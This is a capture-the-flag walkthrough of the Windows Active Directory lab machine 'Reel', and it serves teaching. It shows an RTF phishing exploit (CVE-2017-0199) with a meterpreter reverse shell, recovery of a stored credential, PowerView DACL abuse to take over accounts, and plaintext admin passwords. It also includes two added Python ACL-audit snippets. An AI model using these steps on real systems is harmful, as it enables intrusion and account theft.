The Reel machine was created by egre55. It is a hard Windows machine with a strong focus on Active Directory exploitation. This box was fun; it was nice to finally have a phishing part as well as a small DACL abuse attack chain.
If you didn’t solve this challenge and are just looking for answers, first take a look at this mind map from Orange Cyberdefense and try again. It could give you some hints for attack paths when dealing with Active Directory.
Note: All the actions performed against the target machine have been done with a standard Kali Linux machine. You can download Kali from the official website here.
In a penetration test or red team, reconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting.
This information can then be leveraged by an adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute initial access, to scope and prioritize post-compromise objectives, or to drive and lead further reconnaissance efforts. Here, our only piece of information is an IP address.
Scan with Nmap
Let’s start with a classic service scan with Nmap in order to reveal some of the ports open on the machine.
$ nmap -sV -Pn 10.129.147.8
Starting Nmap 7.92 ( https://nmap.org ) at 2022-02-11 11:18 EST
Nmap scan report for 10.129.147.8
Host is up (0.020s latency).
Not shown: 992 filtered tcp ports (no-response)
PORT      STATE SERVICE      VERSION
21/tcp    open  ftp          Microsoft ftpd
22/tcp    open  ssh          OpenSSH 7.6 (protocol 2.0)
25/tcp    open  smtp
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds (workgroup: HTB)
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49159/tcp open  unknown
Service Info: Host: REEL; OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 171.76 seconds
We have a few interesting ports, including SSH (TCP/22), FTP (TCP/21) and SMTP (TCP/25). Let’s dig a bit more.
After playing around with Nmap scripts, we found an anonymous FTP access.
$ nmap -p 21 --script=ftp-anon -Pn 10.129.147.8
Starting Nmap 7.92 ( https://nmap.org ) at 2022-06-04 09:43 EDT
Nmap scan report for 10.129.147.8
Host is up (0.015s latency).

PORT   STATE SERVICE
21/tcp open  ftp
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_05-29-18  12:19AM       <DIR>          documents

Nmap done: 1 IP address (1 host up) scanned in 0.38 seconds
Here, it seems that we have anonymous access to the FTP server. An anonymous account accepts any string as a password and has limited access rights on an FTP server, but enough to be able to retrieve content.
$ ftp 10.129.147.8
Connected to 10.129.147.8.
220 Microsoft FTP Service
Name (10.129.147.8:ax): anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||41000|)
125 Data connection already open; Transfer starting.
05-28-18  11:19PM       <DIR>          documents
226 Transfer complete.
ftp> cd documents
250 CWD command successful.
ftp> dir
229 Entering Extended Passive Mode (|||41001|)
125 Data connection already open; Transfer starting.
05-28-18  11:19PM                 2047 AppLocker.docx
05-28-18  01:01PM                  124 readme.txt
10-31-17  09:13PM                14581 Windows Event Forwarding.docx
226 Transfer complete.
ftp>
Here, we found a bunch of documents on the FTP. Let’s start with the readme.txt file.
$ cat readme.txt
please email me any rtf format procedures - I'll review and convert.

new format / converted documents will be saved here.
It talks about sending RTF documents via email. In our context, it could make sense given the machine has its SMTP (TCP/25) port open. So we will probably need to send an email at some point.
Now, let’s check AppLocker.docx. It contains the following text:
AppLocker procedure to be documented - hash rules for exe, msi and scripts (ps1,vbs,cmd,bat,js) are in effect.
It seems the target computer has some AppLocker rules in place, so we may need to use a specific bypass later.
For the last document, WindowsEventForwarding.docx, we didn’t find anything interesting in it. However, using exiftool, a metadata reader, we were able to extract an email address.
$ exiftool WindowsEventForwarding.docx
ExifTool Version Number         : 12.39
File Name                       : WindowsEventForwarding.docx
Directory                       : .
File Size                       : 14 KiB
...[snip]...
Zip File Name                   : [Content_Types].xml
Creator                         : email@example.com
Revision Number                 : 4
Create Date                     : 2017:10:31 18:42:00Z
Modify Date                     : 2017:10:31 18:51:00Z
Template                        : Normal.dotm
Total Edit Time                 : 5 minutes
Pages                           : 2
Words                           : 299
Here, it seems that our initial foothold will involve a phishing email that is able to bypass some AppLocker rules.
According to MITRE ATT&CK, adversaries may send victims emails containing malicious attachments or links, typically to execute malicious code on victim systems.
As we need to send an RTF file, it seemed pretty obvious to start with the CVE-2017-0199 exploit, named office_word_hta in Metasploit. This module creates a malicious RTF file that when opened in vulnerable versions of Microsoft Word will lead to code execution.
Let’s configure this module with Metasploit.
msf6 exploit(windows/fileformat/office_word_hta) > show options

Module options (exploit/windows/fileformat/office_word_hta):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  hello.rtf        yes       The file name.
   SRVHOST   10.10.14.20      yes       The local host or network interface to listen on.
   SRVPORT   8080             yes       The local port to listen on.
   SSL       false            no        Negotiate SSL for incoming connections
   SSLCert                    no        Path to a custom SSL certificate (default is randomly generated)
   URIPATH   default.hta      yes       The URI to use for the HTA file

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     tun0             yes       The listen address (an interface may be specified)
   LPORT     443              yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Microsoft Office Word
Now, we just need to enter the exploit command to generate the malicious file and start the listener.
msf6 exploit(windows/fileformat/office_word_hta) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.xx:443
[+] hello.rtf stored at /root/.msf4/local/hello.rtf
[*] Using URL: http://10.10.14.xx:8080/default.hta
[*] Server started.
Note that our malicious file is stored in /root/.msf4/local/hello.rtf. Now, using swaks, an SMTP test tool, we can send our payload to firstname.lastname@example.org.
$ sudo swaks --to email@example.com --server 10.129.147.8 --attach /root/.msf4/local/hello.rtf
[sudo] password for ax:
*** DEPRECATION WARNING: Inferring a filename from the argument to --attach will be removed in the future.  Prefix filenames with '@' instead.
=== Trying 10.129.147.8:25...
=== Connected to 10.129.147.8.
<-  220 Mail Service ready
 -> EHLO nms
<-  250-REEL
<-  250-SIZE 20480000
<-  250-AUTH LOGIN PLAIN
<-  250 HELP
 -> MAIL FROM:<root@nms>
<-  250 OK
 -> RCPT TO:<firstname.lastname@example.org>
<-  250 OK
 -> DATA
<-  354 OK, send.
 -> Date: Fri, 11 Feb 2022 13:17:58 -0500
 -> To: email@example.com
 -> From: root@nms
 -> Subject: test Fri, 11 Feb 2022 13:17:58 -0500
...[snip]...
 ->
 -> .
<-  250 Queued (12.109 seconds)
 -> QUIT
<-  221 goodbye
=== Connection closed with remote host.
After waiting a few seconds, we should get a remote shell on the target machine.
msf6 exploit(windows/fileformat/office_word_hta) >
[*] Sending stage (175174 bytes) to 10.129.147.8
[*] Meterpreter session 1 opened (10.10.14.20:443 -> 10.129.147.8:49509) at 2022-06-04 10:20:04 -0400

msf6 exploit(windows/fileformat/office_word_hta) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : REEL
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : en_GB
Domain          : HTB
Logged On Users : 6
Meterpreter     : x86/windows
Nice, we now have a remote shell and our first flag.
Privilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.
Looking around nico’s Desktop folder, we found a file named cred.xml.
meterpreter > ls C:\\Users\\nico\\Desktop
Listing: C:\Users\nico\Desktop
==============================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  1468  fil   2017-10-27 19:59:16 -0400  cred.xml
100666/rw-rw-rw-  282   fil   2017-10-27 18:42:45 -0400  desktop.ini
100444/r--r--r--  32    fil   2017-10-27 19:40:33 -0400  user.txt
100666/rw-rw-rw-  162   fil   2017-10-27 17:34:38 -0400  ~$iledDeliveryNotification.doc
The file contains a PSCredential object with an encrypted password for Tom.
<Objs Version="184.108.40.206" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>System.Management.Automation.PSCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>System.Management.Automation.PSCredential</ToString>
    <Props>
      <S N="UserName">HTB\Tom</S>
      <SS N="Password">01000000d08c9ddf0115d1118c7a00c04fc297eb01000000e4a07bc7aaeade47925c42c8be5870730000000002000000000003660000c000000010000000d792a6f34a55235c22da98b0c041ce7b0000000004800000a00000001000000065d20f0b4ba5367e53498f0209a3319420000000d4769a161c2794e19fcefff3e9c763bb3a8790deebf51fc51062843b5d52e40214000000ac62dab09371dc4dbfd763fea92b9d5444748692</SS>
    </Props>
  </Obj>
</Objs>
Thanks to PowerShell we can easily retrieve the cleartext password. The SecureString written by Export-Clixml is protected with DPAPI under the key of the user who created the file, so it can only be decrypted from a session running as that user on this machine, which our Meterpreter session is.
meterpreter > load powershell
Loading extension powershell...Success.
meterpreter > powershell_shell
PS > $credential = Import-CliXml -Path c:\users\nico\desktop\cred.xml
PS > $credential.GetNetworkCredential().Password
1ts-mag1c!!!
PS >
We didn’t get any access over WinRM or SMB with these credentials; however, the remote machine does have an SSH server (TCP/22) running.
$ ssh firstname.lastname@example.org
email@example.com's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

tom@REEL C:\Users\tom>
Nice, we have access to the remote machine through SSH.
Digging through Tom’s folders, we found some files related to BloodHound, including the result of a previous scan.
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>dir
 Volume in drive C has no label.
 Volume Serial Number is CC8A-33E1

 Directory of C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors

05/29/2018  07:57 PM    <DIR>          .
05/29/2018  07:57 PM    <DIR>          ..
11/16/2017  11:50 PM           112,225 acls.csv
10/28/2017  08:50 PM             3,549 BloodHound.bin
10/24/2017  03:27 PM           246,489 BloodHound_Old.ps1
10/24/2017  03:27 PM           568,832 SharpHound.exe
10/24/2017  03:27 PM           636,959 SharpHound.ps1
               5 File(s)      1,568,054 bytes
               2 Dir(s)  15,741,628,416 bytes free
The acls.csv file contains the ACLs collected from the domain. We can easily grep it for interesting entries with PowerShell. Let’s start with tom.
tom@REEL C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors>powershell
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Get-Content .\acls.csv | Select-String -Pattern tom
...[snip]...
"claire@HTB.LOCAL","USER","","tom@HTB.LOCAL","USER","WriteOwner","","AccessAllowed","False"
Here we can see that tom has the WriteOwner permission over claire, which means we can change the object’s owner and take over the object. Basically, we own claire. Let’s see what this user can do.
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> Get-Content .\acls.csv | Select-String -Pattern claire
...[snip]...
"Backup_Admins@HTB.LOCAL","GROUP","","claire@HTB.LOCAL","USER","WriteDacl","","AccessAllowed","False"
That’s really interesting: claire has WriteDacl privileges over Backup_Admins, which means we could modify the object’s ACEs and take over Backup_Admins. For now, we don’t really know what Backup_Admins can do, but we will see when we get there.
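Rather than grepping acls.csv one principal at a time, a defender auditing the same export can parse it and walk the takeover-capable ACEs as a graph, which surfaces the tom -> claire -> Backup_Admins chain directly. This is an added example, not part of the original write-up or of BloodHound; the CSV header is assumed from the BloodHound 1.x ingestor, and the sample rows are constructed (the first two are the ones found on the box).

```python
import csv
import io
from collections import defaultdict

# Constructed sample in the layout of the acls.csv above (header assumed from the
# BloodHound 1.x ingestor). Rows 1-2 are the ones found on the box; row 3 is made
# up to show an edge that should not be reported.
SAMPLE_ACLS = """\
ObjectName,ObjectType,ObjectGuid,PrincipalName,PrincipalType,ActiveDirectoryRights,ACEType,AccessControlType,IsInherited
"claire@HTB.LOCAL","USER","","tom@HTB.LOCAL","USER","WriteOwner","","AccessAllowed","False"
"Backup_Admins@HTB.LOCAL","GROUP","","claire@HTB.LOCAL","USER","WriteDacl","","AccessAllowed","False"
"tom@HTB.LOCAL","USER","","Domain Admins@HTB.LOCAL","GROUP","GenericAll","","AccessAllowed","True"
"""

# Rights that let the holder take over the target object outright.
TAKEOVER_RIGHTS = {"GenericAll", "GenericWrite", "WriteDacl", "WriteOwner",
                   "AllExtendedRights", "ForceChangePassword"}
# Principals expected to hold such rights; any other holder is a finding.
EXPECTED_PRINCIPALS = {"Domain Admins@HTB.LOCAL", "Enterprise Admins@HTB.LOCAL"}

def load_edges(text):
    """(principal, target, right) for every allowed, takeover-capable ACE."""
    edges = []
    for row in csv.DictReader(io.StringIO(text)):
        if (row["AccessControlType"] == "AccessAllowed"
                and row["ActiveDirectoryRights"] in TAKEOVER_RIGHTS):
            edges.append((row["PrincipalName"], row["ObjectName"],
                          row["ActiveDirectoryRights"]))
    return edges

def unexpected_edges(edges):
    """Takeover-capable ACEs held by principals that should not have them."""
    return [e for e in edges if e[0] not in EXPECTED_PRINCIPALS]

def takeover_paths(edges, start, max_depth=5):
    """Every chain of ACEs walkable from `start`, as lists of (from, right, to)."""
    graph = defaultdict(list)
    for principal, target, right in edges:
        graph[principal].append((target, right))
    paths = []
    def walk(node, path, seen):
        for target, right in graph.get(node, []):
            if target in seen or len(path) >= max_depth:
                continue  # skip cycles and runaway chains
            new_path = path + [(node, right, target)]
            paths.append(new_path)
            walk(target, new_path, seen | {target})
    walk(start, [], {start})
    return paths
```

Running `takeover_paths(load_edges(SAMPLE_ACLS), "tom@HTB.LOCAL")` returns the two-hop chain ending at Backup_Admins@HTB.LOCAL; on the real acls.csv, point it at every non-admin user to find every such chain.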
Let’s abuse the WriteOwner permission tom has over claire. Here, we used the PowerView.ps1 PowerShell script that was already present on the machine. As a reminder, PowerView is a tool that helps to gain network situational awareness on Windows domains, but it also has some interesting functionality.
PS C:\Users\tom\Desktop\AD Audit\BloodHound\Ingestors> cd ..
PS C:\Users\tom\Desktop\AD Audit\BloodHound> dir

    Directory: C:\Users\tom\Desktop\AD Audit\BloodHound

Mode                LastWriteTime     Length Name
----                -------------     ------ ----
d----         5/29/2018   8:57 PM            Ingestors
-a---        10/30/2017  10:15 PM     769587 PowerView.ps1
First, the PowerView.ps1 module is imported into our PowerShell session. Using Set-DomainObjectOwner we can modify the owner of claire and set it to tom. Given we now have full control over claire, we can use the Add-DomainObjectAcl command to allow tom to reset claire’s password.
Finally, we can use the Set-DomainUserPassword command to modify claire’s password.
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Import-Module .\PowerView.ps1
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Set-DomainObjectOwner -Identity claire -OwnerIdentity tom
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Add-DomainObjectAcl -TargetIdentity claire -PrincipalIdentity tom -Rights ResetPassword
PS C:\Users\tom\Desktop\AD Audit\BloodHound> $creds = ConvertTo-SecureString 'Qwerty123!' -AsPlainText -Force
PS C:\Users\tom\Desktop\AD Audit\BloodHound> Set-DomainUserPassword -identity claire -accountpassword $creds -Verbose
VERBOSE: [Set-DomainUserPassword] Attempting to set the password for user 'claire'
VERBOSE: [Set-DomainUserPassword] Password for user 'claire' successfully reset
Let’s see if we can get SSH access with claire’s domain account.
$ ssh firstname.lastname@example.org
email@example.com's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

claire@REEL C:\Users\claire>
Yep! Now, since claire has WriteDacl privileges over Backup_Admins, we can add our account to this group.
claire@REEL C:\Users\claire>net group backup_admins claire /add
The command completed successfully.

claire@REEL C:\Users\claire>net group backup_admins
Group name     Backup_Admins
Comment

Members

-------------------------------------------------------------------------------
claire                   ranj
The command completed successfully.
Done and done.
Getting the admin password
After some unsuccessful escalation paths, we found something interesting. Being a member of the Backup_Admins group gives us full (F) access over the C:\Users\Administrator folder.
Note that we used the icacls command to display discretionary access control lists (DACLs) on the specified folder.
claire@REEL C:\Users>icacls Administrator
Administrator NT AUTHORITY\SYSTEM:(OI)(CI)(F)
              HTB\Backup_Admins:(OI)(CI)(F)
              HTB\Administrator:(OI)(CI)(F)
              BUILTIN\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
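A non-default group holding (F) on another user's profile is exactly the kind of entry a profile-folder audit should flag. The following is an added example (not from the original write-up) that parses the icacls output above and reports every principal other than SYSTEM, Administrators and the profile owner that has a write-capable right; it assumes the path on the first output line contains no spaces, and the sample output is constructed from the listing above.

```python
import re

# Constructed sample: the `icacls Administrator` output captured from C:\Users above.
ICACLS_OUTPUT = """\
Administrator NT AUTHORITY\\SYSTEM:(OI)(CI)(F)
              HTB\\Backup_Admins:(OI)(CI)(F)
              HTB\\Administrator:(OI)(CI)(F)
              BUILTIN\\Administrators:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files
"""

# Principals expected to hold full control over any user profile folder.
EXPECTED = {"NT AUTHORITY\\SYSTEM", "BUILTIN\\Administrators"}

# icacls rights that allow writing: the simple rights F/M/W plus the specific
# rights (GA, GW, WD, WDAC, WO, DC) that can appear in an explicit (a,b,c) list.
WRITE_RIGHTS = {"F", "M", "W", "GA", "GW", "WD", "WDAC", "WO", "DC"}

def parse_icacls(text):
    """Return (path, [(principal, [flag, ...]), ...]) from `icacls <path>` output.
    Assumption: the path on the first line contains no spaces."""
    lines = [l for l in text.splitlines()
             if l.strip() and not l.startswith("Successfully processed")]
    path, first_ace = lines[0].split(" ", 1)      # path and first ACE share a line
    entries = []
    for ace in [first_ace] + [l.strip() for l in lines[1:]]:
        principal, flags = ace.rsplit(":", 1)   # principal may contain spaces
        entries.append((principal, re.findall(r"\(([^)]*)\)", flags)))
    return path, entries

def grants_write(flags):
    """True if any flag, or any item of an explicit comma-separated list, allows writing."""
    rights = {r for f in flags for r in f.split(",")}
    return bool(rights & WRITE_RIGHTS)

def profile_findings(text):
    """(path, principal, flags) for every unexpected principal with write access."""
    path, entries = parse_icacls(text)
    owner = path.rstrip("\\").split("\\")[-1]   # a profile folder is named after its owner
    return [(path, principal, flags) for principal, flags in entries
            if principal not in EXPECTED
            and principal.split("\\")[-1].lower() != owner.lower()
            and grants_write(flags)]

if __name__ == "__main__":
    for path, principal, flags in profile_findings(ICACLS_OUTPUT):
        print(f"FINDING: {principal} has {''.join('(' + f + ')' for f in flags)} on {path}")
```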
Cool, we should be able to read the root.txt file.
claire@REEL c:\Users\Administrator\Desktop>type root.txt
Access is denied.
Or not. We may be missing some privileges… However, we have access to another folder, Backup Scripts.
claire@REEL c:\Users\Administrator\Desktop>cd "Backup Scripts"

claire@REEL c:\Users\Administrator\Desktop\Backup Scripts>dir
 Volume in drive C has no label.
 Volume Serial Number is CC8A-33E1

 Directory of c:\Users\Administrator\Desktop\Backup Scripts

11/02/2017  09:47 PM    <DIR>          .
11/02/2017  09:47 PM    <DIR>          ..
11/03/2017  11:22 PM               845 backup.ps1
11/02/2017  09:37 PM               462 backup1.ps1
11/03/2017  11:21 PM             5,642 BackupScript.ps1
11/02/2017  09:43 PM             2,791 BackupScript.zip
11/03/2017  11:22 PM             1,855 folders-system-state.txt
11/03/2017  11:22 PM               308 test2.ps1.txt
               6 File(s)         11,903 bytes
               2 Dir(s)  15,738,982,400 bytes free
The folder contains multiple scripts, and one of them has interesting information in it.
claire@REEL c:\Users\Administrator\Desktop\Backup Scripts>type BackupScript.ps1
# admin password
$password="Cr4ckMeIfYouC4n!"

#Variables, only Change here
$Destination="\\BACKUP03\BACKUP" #Copy the Files to this Location
Let’s see if this password works with the administrator account.
$ ssh firstname.lastname@example.org
email@example.com's password:
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.

administrator@REEL C:\Users\Administrator>

administrator@REEL C:\Users\Administrator\Desktop>ls
'ls' is not recognized as an internal or external command,
operable program or batch file.

administrator@REEL C:\Users\Administrator\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is CC8A-33E1

 Directory of C:\Users\Administrator\Desktop

21/01/2018  14:56    <DIR>          .
21/01/2018  14:56    <DIR>          ..
02/11/2017  21:47    <DIR>          Backup Scripts
28/10/2017  11:56                32 root.txt
               1 File(s)             32 bytes
               3 Dir(s)  15,738,458,112 bytes free
We now have access to the second flag.
Awesome! I hope you enjoyed it, I know I did :)